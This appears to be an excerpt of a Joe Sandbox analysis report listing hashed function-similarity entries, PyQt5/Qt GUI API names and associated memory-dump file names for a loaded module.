                                                                                                                                                                                                                • Opcode ID: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
                                                                                                                                                                                                                • Instruction ID: 6739d541622c987af809943aee338f71f5161623bfbb3014e0a4febb0b711531
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25210BB6608B4BD1EB209F25E8882A933B8FB45784FA14076DA4D43724DF3DE54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?distanceDoubleFloat_FromLine@V1@0@Vector2
                                                                                                                                                                                                                • String ID: BJ9J9$QVector2D$distanceToLine$distanceToLine(self, point: QVector2D, direction: QVector2D) -> float
                                                                                                                                                                                                                • API String ID: 1543135828-405816686
                                                                                                                                                                                                                • Opcode ID: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
                                                                                                                                                                                                                • Instruction ID: c133ca5425511cf53ab6c8a5f7187f207c484db4cf47a2c75c0c2073563456e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8127b268a2bbf6dd7300f6d9f691489e5ef914b8f61927b9e049137e4a07284
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA110AB6A18F46C1DB20DF60E8896AD33B8FB54784FA181B6CA9D47310DF39D999C350
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?showNormal@RestoreSaveWindow@@
                                                                                                                                                                                                                • String ID: QWindow$showNormal$showNormal(self)
                                                                                                                                                                                                                • API String ID: 426591181-900794078
                                                                                                                                                                                                                • Opcode ID: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
                                                                                                                                                                                                                • Instruction ID: d937ae4c6f561a2be6e047d78d56b45e16dbbb2deca652d59331c1765f4d2107
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5fd94cd696d468a522a48b1a41e003fb38d53b90f0e7a6bdef6da97b9826e45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 971118B5A08B56C1EB609F21E8886A933B8FB49B84F9440B6CE4D03320CF7CD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?showFullRestoreSaveScreen@Window@@
                                                                                                                                                                                                                • String ID: QWindow$showFullScreen$showFullScreen(self)
                                                                                                                                                                                                                • API String ID: 1691872468-1449107341
                                                                                                                                                                                                                • Opcode ID: e38ce4d91b00c6bebc1a2a9cba344029768b7a11acf579c91095a18fee459245
                                                                                                                                                                                                                • Instruction ID: 1b99e83380881ee2e3b8182bf5a0cf0f4f1c66cbf006e3dfa78a6c22ce29ba6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e38ce4d91b00c6bebc1a2a9cba344029768b7a11acf579c91095a18fee459245
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 451118B5A18B56C1EB60DF21E8886A933A8FB49B84F9540B6CE4D03320CF7CD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
                                                                                                                                                                                                                • String ID: BJ9$QValidator$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
                                                                                                                                                                                                                • API String ID: 544305041-213352429
                                                                                                                                                                                                                • Opcode ID: 9cf68d400014dc3102c57e0a67e5e06fa5ba4949f53b0782a2d33e981d16a8d5
                                                                                                                                                                                                                • Instruction ID: eec27535827d7d0f3f9fff85d8956dc238e32d813fb09a60ed292b8e62ab74a6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf68d400014dc3102c57e0a67e5e06fa5ba4949f53b0782a2d33e981d16a8d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 461139B5A18F46D1EB10DF25E8896A933A9FB45B88FA140B2CA5C03320DF3DD599C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?begin@Bool_Device@@@FromLongPaintPainter@@
                                                                                                                                                                                                                • String ID: BJ8$QPainter$begin$begin(self, a0: Optional[QPaintDevice]) -> bool
                                                                                                                                                                                                                • API String ID: 3984307418-3860318878
                                                                                                                                                                                                                • Opcode ID: bb5f36534580da56cea98a54d2a69d215c2894297882dd4b0a9c1d3a65f71615
                                                                                                                                                                                                                • Instruction ID: 1e08a2873d2c63eb0a29c9191f3c82ce62c7de8f60f0e1a1dc73fb3a6c826769
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb5f36534580da56cea98a54d2a69d215c2894297882dd4b0a9c1d3a65f71615
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 151139B5A18F46D1EB10DF25E8986A933A8FB84B84FA140B6CA5D13320DF3DD959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_CopyCursor@@FromLongTextV1@@
                                                                                                                                                                                                                • String ID: BJ9$QPalette$isCopyOf$isCopyOf(self, p: QPalette) -> bool
                                                                                                                                                                                                                • API String ID: 1629049401-1984342418
                                                                                                                                                                                                                • Opcode ID: 5638dcb58a6b2f3d1cd7bd179e4736624b571b24c1a62cd3d49bbffcf1faee26
                                                                                                                                                                                                                • Instruction ID: 0f98a0abf62de8f933d7c989dde21b6a86f5974be654cf636c75a70ff1a12033
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5638dcb58a6b2f3d1cd7bd179e4736624b571b24c1a62cd3d49bbffcf1faee26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27111BB5A18F46C1EB10DF20E8986A933A9FB84B84FA14076CA5D03320CF3DD959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?sizePixels@QPageSize@@QEBA?AVQSize@@H@Z.QT5GUI ref: 00007FFB9A35FB39
                                                                                                                                                                                                                • ?sizePixels@QPageSize@@SA?AVQSize@@W4PageSizeId@1@H@Z.QT5GUI ref: 00007FFB9A35FBB0
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Size@@$Page$?sizePixels@$Id@1@Sizemalloc
                                                                                                                                                                                                                • String ID: QPageSize$sizePixels$sizePixels(self, resolution: int) -> QSizesizePixels(pageSizeId: QPageSize.PageSizeId, resolution: int) -> QSize
                                                                                                                                                                                                                • API String ID: 2324535246-1560509091
                                                                                                                                                                                                                • Opcode ID: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
                                                                                                                                                                                                                • Instruction ID: 12cb1fb9b8c4653ba150fb1b4ea491d51c6e5b42401ad35fbd82842888845fb7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3316EB2B18A46C2FB50CB25E8586A933A9FB89B84F614176DE4D43320DF3CD489CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB9A3F9D48
                                                                                                                                                                                                                • ?getAxes@QQuaternion@@QEBAXPEAVQVector3D@@00@Z.QT5GUI ref: 00007FFB9A359BE5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
